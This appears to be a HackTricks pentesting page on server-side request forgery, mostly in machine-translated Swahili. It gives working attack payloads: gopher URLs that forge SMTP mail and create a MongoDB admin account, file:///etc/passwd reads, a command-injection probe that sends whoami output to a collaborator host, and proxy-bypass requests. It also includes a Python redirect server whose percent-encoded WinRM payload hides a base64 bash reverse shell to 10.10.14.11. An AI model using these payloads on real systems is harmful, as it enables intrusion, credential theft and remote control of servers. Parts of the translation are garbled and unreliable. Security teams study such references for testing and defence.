HackTricksSSRF (Server Side Request Forgery)
Reading time: 23 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Basic Information
Uthibitisho wa Server-side Request Forgery (SSRF) hutokea wakati mshambuliaji anaposhawishi programu ya upande wa seva kufanya maombi ya HTTP kwa kikoa chochote anachokichagua. Uthibitisho huu unafichua seva kwa maombi ya nje yasiyo na mipaka yanayoelekezwa na mshambuliaji.
Capture SSRF
Jambo la kwanza unahitaji kufanya ni kukamata mwingiliano wa SSRF ulioanzishwa na wewe. Ili kukamata mwingiliano wa HTTP au DNS unaweza kutumia zana kama:
- Burp Collaborator
- pingb
- canarytokens
- interractsh
- http://webhook.site
- https://github.com/teknogeek/ssrf-sheriff
- http://requestrepo.com/
- https://github.com/stolenusername/cowitness
- https://github.com/dwisiswant0/ngocok - Burp Collaborator inayotumia ngrok
Whitelisted Domains Bypass
Kwa kawaida utagundua kuwa SSRF inafanya kazi tu katika kikoa fulani kilichoorodheshwa au URL. Katika ukurasa ufuatao una mkusanyiko wa mbinu za kujaribu kupita orodha hiyo:
{{#ref}} url-format-bypass.md {{#endref}}
Bypass via open redirect
Ikiwa seva imekingwa ipasavyo unaweza kupita vizuizi vyote kwa kutumia Open Redirect ndani ya ukurasa wa wavuti. Kwa sababu ukurasa wa wavuti utaruhusu SSRF kwa kikoa hicho hicho na labda uta fuata redirects, unaweza kutumia Open Redirect kufanya seva kufikia rasilimali za ndani.
Soma zaidi hapa: https://portswigger.net/web-security/ssrf
Protocols
- file://
- Mpango wa URL
file://unarejelea, ukielekeza moja kwa moja kwa/etc/passwd:file:///etc/passwd - dict://
- Mpango wa URL wa DICT unafafanuliwa kama unavyotumika kwa kufikia maelezo au orodha za maneno kupitia itifaki ya DICT. Mfano uliopewa unaonyesha URL iliyojengwa ikilenga neno maalum, hifadhidata, na nambari ya kuingia, pamoja na mfano wa skripti ya PHP inayoweza kutumika vibaya kuungana na seva ya DICT kwa kutumia akidi zilizotolewa na mshambuliaji:
dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n> - SFTP://
- Imeainishwa kama itifaki ya uhamishaji wa faili salama kupitia shell salama, mfano unapatikana ukionyesha jinsi skripti ya PHP inaweza kutumika vibaya kuungana na seva ya SFTP mbaya:
url=sftp://generic.com:11111/ - TFTP://
- Itifaki ya Uhamishaji wa Faili ya Trivial, inayofanya kazi kupitia UDP, inatajwa na mfano wa skripti ya PHP iliyoundwa kutuma ombi kwa seva ya TFTP. Ombi la TFTP linatolewa kwa 'generic.com' kwenye bandari '12346' kwa faili 'TESTUDPPACKET':
ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET - LDAP://
- Sehemu hii inashughulikia Itifaki ya Upatikanaji wa Katalogi Nyepesi, ikisisitiza matumizi yake katika kusimamia na kufikia huduma za habari za katalogi zilizogawanywa kupitia mitandao ya IP. Shughulika na seva ya LDAP kwenye localhost:
'%0astats%0aquit' kupitia ssrf.php?url=ldap://localhost:11211/%0astats%0aquit. - SMTP
- Njia inaelezewa kwa kutumia udhaifu wa SSRF kuingiliana na huduma za SMTP kwenye localhost, ikiwa ni pamoja na hatua za kufichua majina ya kikoa cha ndani na hatua zaidi za uchunguzi kulingana na habari hiyo.
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect
- Curl URL globbing - WAF bypass
- Ikiwa SSRF inatekelezwa na curl, curl ina kipengele kinachoitwa URL globbing ambacho kinaweza kuwa na manufaa katika kupita WAFs. Kwa mfano katika hii writeup unaweza kupata mfano huu wa path traversal kupitia protokali ya
file:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
- Gopher://
- Uwezo wa itifaki ya Gopher wa kubainisha IP, bandari, na bytes kwa mawasiliano ya seva unajadiliwa, pamoja na zana kama Gopherus na remote-method-guesser kwa ajili ya kutunga payloads. Matumizi mawili tofauti yanaonyeshwa:
Gopher://
Kwa kutumia itifaki hii unaweza kubainisha IP, bandari na bytes unazotaka seva itume. Kisha, unaweza kimsingi kutumia SSRF ili kuwasiliana na seva yoyote ya TCP (lakini unahitaji kujua jinsi ya kuzungumza na huduma hiyo kwanza).
Kwa bahati nzuri, unaweza kutumia Gopherus kutunga payloads kwa huduma kadhaa. Zaidi ya hayo, remote-method-guesser inaweza kutumika kutunga gopher payloads kwa huduma za Java RMI.
Gopher smtp
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT
Gopher HTTP
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
Gopher SMTP — Back connect to 1337
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.
Gopher MongoDB -- Unda mtumiaji mwenye jina la mtumiaji=admin na nenosiri=admin123 na ruhusa=administrator
# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'
SSRF kupitia kichwa cha Referrer & Mengineyo
Programu za uchambuzi kwenye seva mara nyingi huandika kichwa cha Referrer ili kufuatilia viungo vinavyoingia, mbinu ambayo kwa bahati mbaya inafichua programu kwa udhaifu wa Server-Side Request Forgery (SSRF). Hii ni kwa sababu programu hizo zinaweza kutembelea URL za nje zilizotajwa katika kichwa cha Referrer ili kuchambua maudhui ya tovuti za rejeleo. Ili kugundua udhaifu hizi, nyongeza ya Burp Suite "Collaborator Everywhere" inapendekezwa, ikitumia jinsi zana za uchambuzi zinavyoshughulikia kichwa cha Referer ili kubaini maeneo yanayoweza kushambuliwa kwa SSRF.
SSRF kupitia data ya SNI kutoka kwa cheti
Usanidi usio sahihi ambao unaweza kuwezesha muunganisho na nyuma yoyote kupitia usanidi rahisi umeonyeshwa kwa mfano wa usanidi wa Nginx:
stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}
Katika usanidi huu, thamani kutoka kwa uwanja wa Server Name Indication (SNI) inatumika moja kwa moja kama anwani ya backend. Mipangilio hii inafichua udhaifu wa Server-Side Request Forgery (SSRF), ambao unaweza kutumiwa kwa kutaja tu anwani ya IP au jina la kikoa katika uwanja wa SNI. Mfano wa matumizi ili kulazimisha muunganisho na backend isiyo ya kawaida, kama internal.host.com, kwa kutumia amri ya openssl unapatikana hapa chini:
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
Wget file upload
SSRF na Command Injection
Inaweza kuwa na faida kujaribu payload kama: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
PDFs Rendering
Ikiwa ukurasa wa wavuti unaunda kiotomatiki PDF na baadhi ya taarifa ulizotoa, unaweza kuingiza JS ambayo itatekelezwa na munda wa PDF mwenyewe (server) wakati wa kuunda PDF na utaweza kutumia SSRF. Pata maelezo zaidi hapa.
Kutoka SSRF hadi DoS
Unda vikao kadhaa na jaribu kupakua faili nzito ukitumia SSRF kutoka kwa vikao.
SSRF PHP Functions
Angalia ukurasa ufuatao kwa kazi za PHP zenye udhaifu na hata kazi za Wordpress:
{{#ref}} ../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md {{#endref}}
SSRF Redirect to Gopher
Kwa baadhi ya matumizi unaweza kuhitaji kutuma jibu la kuhamasisha (inaweza kuwa kutumia protokali tofauti kama gopher). Hapa una misimbo tofauti ya python kujibu kwa kuhamasisha:
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
self.end_headers()
httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
Misconfigured proxies to SSRF
Tricks from this post.
Flask
Flask proxy vulnerable code
from flask import Flask
from requests import get
app = Flask('__main__')
SITE_NAME = 'https://google.com'
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content
if __name__ == "__main__":
app.run(threaded=False)
Flask inaruhusu kutumia @ kama herufi ya mwanzo, ambayo inaruhusu kufanya jina la mwenyeji wa mwanzo kuwa jina la mtumiaji na kuingiza mpya. Ombi la shambulio:
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close
Spring Boot
Msimbo unaoweza kuathiriwa:
.png)
Iligundulika kwamba inawezekana kuanza njia ya ombi kwa herufi ; ambayo inaruhusu kutumia kisha @ na kuingiza mwenyeji mpya ili kufikia. Ombi la shambulio:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
PHP Built-in Web Server
Kanuni ya PHP yenye udhaifu
<?php
$site = "http://ifconfig.me";
$current_uri = $_SERVER['REQUEST_URI'];
$proxy_site = $site.$current_uri;
var_dump($proxy_site);
echo "\n\n";
$response = file_get_contents($proxy_site);
var_dump($response);
?>
PHP inaruhusu matumizi ya char * kabla ya slash katika njia ya URL, hata hivyo, ina mipaka mingine kama vile kwamba inaweza kutumika tu kwa njia ya mzizi / na kwamba alama za nukta . haziruhusiwi kabla ya slash ya kwanza, hivyo inahitajika kutumia anwani ya IP iliyokodi kwa hex bila nukta kwa mfano:
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close
DNS Rebidding CORS/SOP bypass
Ikiwa unakutana na matatizo ya kuondoa maudhui kutoka kwa IP ya ndani kwa sababu ya CORS/SOP, DNS Rebidding inaweza kutumika kupita kikomo hicho:
{{#ref}} ../cors-bypass.md {{#endref}}
Automated DNS Rebidding
Singularity of Origin ni chombo cha kufanya DNS rebinding mashambulizi. Inajumuisha vipengele muhimu vya kubadilisha anwani ya IP ya jina la DNS la seva ya shambulizi kwa anwani ya IP ya mashine lengwa na kutoa mzigo wa shambulizi ili kutumia programu dhaifu kwenye mashine lengwa.
Angalia pia seva inayoendesha hadharani katika http://rebind.it/singularity.html
DNS Rebidding + TLS Session ID/Session ticket
Mahitaji:
- SSRF
- Sehemu za TLS za nje
- Vitu kwenye port za ndani
Shambulizi:
- Muulize mtumiaji/boti kupata domain inayodhibitiwa na mshambuliaji
- TTL ya DNS ni 0 sekunde (hivyo mwathirika atakagua IP ya domain tena hivi karibuni)
- Muunganisho wa TLS unaundwa kati ya mwathirika na domain ya mshambuliaji. Mshambuliaji anaingiza mzigo ndani ya Session ID au Session Ticket.
- Domain itaanza mzunguko usio na mwisho wa kuelekeza dhidi ya yeye mwenyewe. Lengo la hili ni kumfanya mtumiaji/boti kufikia domain hadi ifanye tena ombwe la DNS la domain.
- Katika ombi la DNS anwani ya IP ya kibinafsi inatolewa sasa (127.0.0.1 kwa mfano)
- Mtumiaji/boti atajaribu kuanzisha tena muunganisho wa TLS na ili kufanya hivyo atatuma Session ID/Ticket ID (ambapo mzigo wa mshambuliaji ulikuwa umejumuishwa). Hivyo hongera umefaulu kumwambia mtumiaji/boti ajishambulie mwenyewe.
Kumbuka kwamba wakati wa shambulizi hili, ikiwa unataka kushambulia localhost:11211 (memcache) unahitaji kumfanya mwathirika kuanzisha muunganisho wa awali na www.attacker.com:11211 (port lazima iwe sawa kila wakati).
Ili kufanya shambulizi hili unaweza kutumia chombo: https://github.com/jmdx/TLS-poison/
Kwa maelezo zaidi angalia mazungumzo ambapo shambulizi hili linaelezewa: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference
Blind SSRF
Tofauti kati ya blind SSRF na isiyo blind ni kwamba katika blind huwezi kuona jibu la ombi la SSRF. Hivyo, ni vigumu zaidi kutumia kwa sababu utaweza kutumia tu udhaifu unaojulikana vizuri.
Time based SSRF
Kuangalia muda wa majibu kutoka kwa seva inaweza kuwa inawezekana kujua ikiwa rasilimali ipo au la (labda inachukua muda zaidi kufikia rasilimali iliyopo kuliko kufikia ile isiyopo)
Cloud SSRF Exploitation
Ikiwa unapata udhaifu wa SSRF katika mashine inayofanya kazi ndani ya mazingira ya wingu unaweza kuwa na uwezo wa kupata taarifa za kuvutia kuhusu mazingira ya wingu na hata akidi:
{{#ref}} cloud-ssrf.md {{#endref}}
SSRF Vulnerable Platforms
Majukwaa kadhaa yanayojulikana yana au yamekuwa na udhaifu wa SSRF, angalia katika:
{{#ref}} ssrf-vulnerable-platforms.md {{#endref}}
Tools
SSRFMap
Chombo cha kugundua na kutumia udhaifu wa SSRF
Gopherus
Chombo hiki kinazalisha mzigo wa Gopher kwa:
- MySQL
- PostgreSQL
- FastCGI
- Redis
- Zabbix
- Memcache
remote-method-guesser
remote-method-guesser ni skana ya udhaifu wa Java RMI inayounga mkono operesheni za shambulizi kwa udhaifu wa kawaida wa Java RMI. Operesheni nyingi zinazopatikana zinaunga mkono chaguo --ssrf, ili kuzalisha mzigo wa SSRF kwa operesheni iliyotakiwa. Pamoja na chaguo --gopher, mzigo wa gopher unaoweza kutumika moja kwa moja unaweza kuzalishwa.
SSRF Proxy
SSRF Proxy ni seva ya proxy ya HTTP yenye nyuzi nyingi iliyoundwa kutunza trafiki ya HTTP ya mteja kupitia seva za HTTP zilizo dhaifu kwa Server-Side Request Forgery (SSRF).
To practice
{{#ref}} https://github.com/incredibleindishell/SSRF_Vulnerable_Lab {{#endref}}
References
- https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
- https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/
- https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.